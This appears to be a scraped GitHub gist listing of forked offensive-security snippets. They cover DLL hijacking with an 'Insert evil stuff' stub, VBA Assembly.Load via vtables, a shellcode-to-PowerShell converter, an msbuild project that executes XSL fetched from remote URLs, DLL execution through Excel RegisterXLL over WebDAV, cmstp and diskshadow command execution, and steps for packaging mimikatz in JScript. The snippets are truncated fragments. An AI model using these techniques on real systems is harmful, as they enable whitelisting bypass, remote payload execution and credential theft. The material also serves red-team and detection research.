@sacwtv
sacwtv / main.cpp
Created January 9, 2023 02:18 — forked from monoxgas/main.cpp
Adapative DLL Hijacking - Stability Hooking
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
DWORD WINAPI Thread(LPVOID lpParam) {
// Insert evil stuff
ExitProcess(0);
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
class Program
{
static void Main(string[] args)
{
sacwtv / mscorlib_load_assembly.vba
Created March 12, 2020 08:57 — forked from clavoillotte/mscorlib_load_assembly.vba
VBA code for calling Assembly.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&
sacwtv / raw2ps_shellcode.py
Created March 12, 2020 08:56 — forked from byt3bl33d3r/raw2ps_shellcode.py
Converts raw shellcode to a PowerShell compatible byte array (helpful when using custom shellcode with Invoke-Shellcode.ps1)
import sys
ps_shellcode = '@('
with open(sys.argv[1], 'rb') as shellcode:
byte = shellcode.read(1)
while byte != '':
ps_shellcode += '0x{}, '.format(byte.encode('hex'))
byte = shellcode.read(1)
sacwtv / LoadXSLFromMem.cs
Created March 12, 2020 08:55 — forked from byt3bl33d3r/LoadXSLFromMem.cs
Loads XSL files from memory (or disk) using the Microsoft.XMLDOM COM object.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
using System.Text;
using System.Threading.Tasks;
namespace TryCOMXSLLoad
{
class Program
sacwtv / xslt.proj
Created March 12, 2020 08:54 — forked from byt3bl33d3r/xslt.proj
msbuild XSLT Execute From URL
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
<Target Name="Example">
<ItemGroup>
<XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" />
</ItemGroup>
<PropertyGroup>
<XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile>
</PropertyGroup>
<XslTransformation
OutputPaths="output.%(XmlFiles.FileName).html"
sacwtv / ExcelXLL.md
Created March 12, 2020 08:54 — forked from byt3bl33d3r/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local; it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk, but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file; however, there is a security warning. @rxwx has more notes on this here inc

sacwtv / test.inf
Created March 12, 2020 08:51 — forked from bohops/test.inf
Test inf-sct execution (+++ @NickTyrer - https://gist.github.com/NickTyrer/)
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
Execute
=======
*Interactive Mode
cmd.exe
c:\windows\system32\diskshadow.exe
> exec calc.exe
> exec "cmd.exe" /c calc.exe
> exit
It is basically a wrap of the following projects:
- mimikatz (https://github.com/gentilkiwi/mimikatz)
- mimikatz in .NET by Casey Smith (https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7)
Updated from 2.0.0 to 2.1.1 (https://gist.github.com/pljoel/410eeebcaf118b9ac8b8f2b40fd5e863)
- DotNetToJScript (https://github.com/tyranid/DotNetToJScript)
INSTRUCTIONS:
1. Grab the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
2. a) Uncomment the building lines from Casey's project in Delivery.Program.Main() (You may want to comment the Exec() line though)
b) It is going to produce a file.b64, so copy its content and replace the Delivery.Package.file string with it